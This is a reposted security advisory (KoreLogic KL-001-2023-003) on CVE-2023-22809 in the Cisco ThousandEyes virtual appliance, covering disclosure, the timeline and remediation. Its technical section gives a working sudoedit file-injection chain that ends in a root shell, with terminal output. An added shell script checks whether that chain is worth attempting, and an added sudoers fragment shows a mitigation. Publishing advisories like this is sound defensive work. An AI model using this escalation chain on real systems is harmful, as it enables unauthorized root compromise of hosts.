## https://sploitus.com/exploit?id=1337DAY-ID-38980
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit
Advisory ID: KL-001-2023-003
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt


1. Vulnerability Details

      Affected Vendor: ThousandEyes
      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
      Affected Version: thousandeyes-va-64-18.04 0.218
      Platform: Linux / Ubuntu 18.04
      CWE Classification: CWE-1395: Dependency on Vulnerable
                          Third-Party Component
      CVE ID: CVE-2023-22809


2. Vulnerability Description

      An unpatched sudoedit vulnerability (CVE-2023-22809), reachable
      through a sudoers rule that lets the 'thousandeyes' account run
      sudoedit without a password, permits a low-privilege user to
      modify arbitrary files as root and subsequently execute arbitrary
      commands as root.


3. Technical Description

    The ThousandEyes Virtual Appliance is distributed with a sudoers
    policy that lets the 'thousandeyes' account run a restrictive set
    of commands via sudo without supplying its password. One of those
    commands is 'sudoedit /etc/hosts'. The sudo shipped on the
    appliance is affected by CVE-2023-22809: sudoedit builds the editor
    command line from the user-controlled SUDO_EDITOR, VISUAL or EDITOR
    environment variable, and a value containing "--" followed by a
    path makes sudoedit treat that path as an additional file to edit,
    outside the check that restricts the rule to /etc/hosts. The
    sudoedit rule can therefore be abused to modify any file on the
    filesystem as root. The sudo bug itself was already public (see
    https://seclists.org/oss-sec/2023/q1/42), but its exposure through
    the ThousandEyes Virtual Appliance had not been disclosed. It leads
    to root-level compromise of the virtual appliance.

      thousandeyes@thousandeyes-va:~$ id
      uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
      thousandeyes@thousandeyes-va:~$ sudo -l
      Matching Defaults entries for thousandeyes on thousandeyes-va:
          env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

      User thousandeyes may run the following commands on thousandeyes-va:
          (ALL : ALL) ALL
          (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va,
              /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop te-agent,
              /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot,
              /bin/systemctl stop te-browserbot, /bin/systemctl restart te-browserbot, /bin/systemctl status te-browserbot,
              /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update,
              /usr/bin/apt-get install te-agent, /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va,
              /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install te-intl-fonts,
              /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache,
              /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
          (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

    Two things stand out. First, the '(ALL : ALL) ALL' entry still
    requires the account password, whereas nothing on the NOPASSWD
    line does; the NOPASSWD line is what matters to an attacker who
    holds a shell as 'thousandeyes' but not the password. Second, the
    wildcards /usr/bin/te-*, /usr/local/bin/te-* and
    /usr/local/sbin/te-* let anything matching those names run as root
    with no password. Even though sudoedit is only permitted to edit
    /etc/hosts, setting EDITOR to a value ending in '-- <path>' makes
    the vulnerable sudoedit open <path> as a second file. So pick one
    of the existing te-* scripts, overwrite its contents with a line
    that starts a shell, and run it via sudo. No shebang is needed:
    when execve() of the file fails with ENOEXEC, sudo re-runs it
    through /bin/sh, which executes the single line '/bin/bash' as
    root:

      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
      /usr/local/bin/te-set-config: Python script, ASCII text executable
      thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
      sudoedit: --: editing files in a writable directory is not permitted
      2 files to edit
      sudoedit: /etc/hosts unchanged
      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
      /usr/local/bin/te-set-config: ASCII text
      thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
      /bin/bash
      thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
      root@thousandeyes-va:~# id
      uid=0(root) gid=0(root) groups=0(root)
      root@thousandeyes-va:~#
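The following triage script is an addition to this page; it is not part of the KoreLogic advisory or of the ThousandEyes appliance. It decides from the output of 'sudo --version' and 'sudo -l' whether the chain above is worth attempting as the current user: an affected sudo (1.8.0 through 1.9.12p1, the range given by the sudo project for CVE-2023-22809) combined with a sudoedit rule on a NOPASSWD line. The 'sudo -l' sample embedded in it is constructed and shortened from the listing above; the function names are the author's own.

```shell
#!/bin/sh
# Triage helper added to this page; not part of the KoreLogic advisory or the
# ThousandEyes appliance. It decides, from `sudo --version` and `sudo -l` output,
# whether the sudoedit file injection (CVE-2023-22809) is worth attempting.

# Extract the bare version from the first line of `sudo --version`
# ("Sudo version 1.8.21p2" -> "1.8.21p2").
sudo_version_from_banner() {
    sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# True (exit 0) when the version is inside the range the sudo project lists for
# CVE-2023-22809: 1.8.0 through 1.9.12p1. "MAJOR.MINOR.PATCH[pN]" is mapped onto
# one integer (MAJOR, then three zero-padded fields) so a numeric compare works.
sudo_version_vulnerable() {
    key=$(printf '%s\n' "$1" | awk -F'[.p]' '{ printf "%d%03d%03d%03d\n", $1, $2, $3, $4 }')
    [ "$key" -ge 1008000000 ] && [ "$key" -le 1009012001 ]
}

# Read `sudo -l` output on stdin; print each command entry that is NOPASSWD and
# contains a sudoedit rule. sudo -l wraps long entries onto indented continuation
# lines, so each entry is reassembled before matching. Entries that need a
# password (such as "(ALL : ALL) ALL" on the appliance) are ignored: the attacker
# model here is a shell as the user without the user's password.
sudoedit_nopasswd_entries() {
    awk '
        function flush() {
            gsub(/[ \t]+/, " ", entry); sub(/^ /, "", entry)
            if (entry ~ /NOPASSWD:/ && entry ~ /sudoedit/) print entry
            entry = ""
        }
        /may run the following commands/          { inlist = 1; next }
        inlist && /^[ \t]*\(/                      { flush(); entry = $0; next }
        inlist && entry != "" && /^[ \t]+[^ \t]/   { entry = entry " " $0; next }
        inlist && entry != ""                      { flush() }
        END                                        { if (entry != "") flush() }
    '
}

# Verdict: exit 0 and print the offending entries when the sudo version is
# affected AND a NOPASSWD sudoedit rule exists; exit 1 otherwise.
sudoedit_exposed() {
    version="$1"; listing="$2"
    entries=$(printf '%s\n' "$listing" | sudoedit_nopasswd_entries)
    [ -n "$entries" ] || return 1
    sudo_version_vulnerable "$version" || return 1
    printf '%s\n' "$entries"
}

# Constructed sample, modelled on (and shortened from) the advisory's `sudo -l`.
SAMPLE_SUDO_L='Matching Defaults entries for thousandeyes on thousandeyes-va:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /sbin/reboot,
        sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/te-*, /usr/local/bin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump'

# Stand-alone demo on the sample. On a real host, as the unprivileged user, run:
#   sudoedit_exposed "$(sudo --version | sudo_version_from_banner)" "$(sudo -l)"
if sudoedit_exposed "1.8.21p2" "$SAMPLE_SUDO_L"; then
    echo "EXPOSED: affected sudo plus the NOPASSWD sudoedit rule printed above"
else
    echo "not exposed on the sample"
fi
```

Treat a version match as a hint rather than proof: distribution packages often backport the fix without changing the upstream version string (Ubuntu 18.04's sudo stays at 1.8.21p2 after the fix, for example). The definitive test is the one in the transcript above: an EDITOR value of the form 'vim -- <path>' that actually opens the injected file.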


4. Mitigation and Remediation Recommendation

      The vendor has released a version which remediates the described
      vulnerability. Release notes are available at:

      https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994
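For operators who cannot take the vendor update immediately, the sudo project's advisory for CVE-2023-22809 gives a sudoers-level mitigation: delete the editor environment variables for sudoedit rules. The fragment below is an added illustration, not the appliance's shipped policy and not Cisco's fix; it sets a rule shaped like the appliance's beside a hardened version. The explicit command name in the hardened rule is an assumption, chosen only to show the shape of a wildcard-free entry.

```sudoers
# Weak: on a sudo in the affected range (1.8.0 through 1.9.12p1) sudoedit honours
# "-- <path>" in SUDO_EDITOR/VISUAL/EDITOR, so this rule lets the user edit any
# file as root without a password, and the wildcard turns that write into root
# code execution via any te-* script.
thousandeyes ALL=(ALL) NOPASSWD: sudoedit /etc/hosts, /usr/local/bin/te-*

# Hardened. Mitigation from the sudo advisory: strip the user-controlled editor
# variables for sudoedit, so it falls back to the sudoers "editor" setting.
Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"
# Replace wildcards with the explicit programs the appliance needs (name assumed).
thousandeyes ALL=(ALL) NOPASSWD: sudoedit /etc/hosts, /usr/local/bin/te-set-config
```

Check a fragment with 'visudo -cf <file>' before installing it under /etc/sudoers.d; a syntax error in sudoers locks everyone out of sudo. The env_delete line removes the file-injection primitive but is no substitute for a patched sudo (1.9.12p2 or later, or the distribution's backported fix).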


5. Credit

      This vulnerability was discovered by Jim Becher of
      KoreLogic, Inc.


6. Disclosure Timeline

      2023.04.26 - KoreLogic submits vulnerability details to Cisco.
      2023.04.26 - Cisco acknowledges receipt and the intention to
                   investigate.
      2023.05.04 - Cisco notifies KoreLogic that a remediation for this
                   vulnerability is expected to be available within
                   90 days.
      2023.06.30 - 45 business days have elapsed since KoreLogic reported
                   this vulnerability to the vendor.
      2023.07.11 - Cisco informs KoreLogic that the issue has been
                   remediated in the latest ThousandEyes Virtual
                   Appliance and a Third Party Software Release Note
                   Enclosure will be released 2023.08.16. Cisco
                   provides CVE-2023-22809 to track this vulnerability.
      2023.07.24 - 60 business days have elapsed since KoreLogic reported
                   this vulnerability to the vendor.
      2023.08.16 - Cisco public acknowledgement.
      2023.08.17 - KoreLogic public disclosure.


7. Proof of Concept

      See 3. Technical Description.


The contents of this advisory are copyright(c) 2023
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/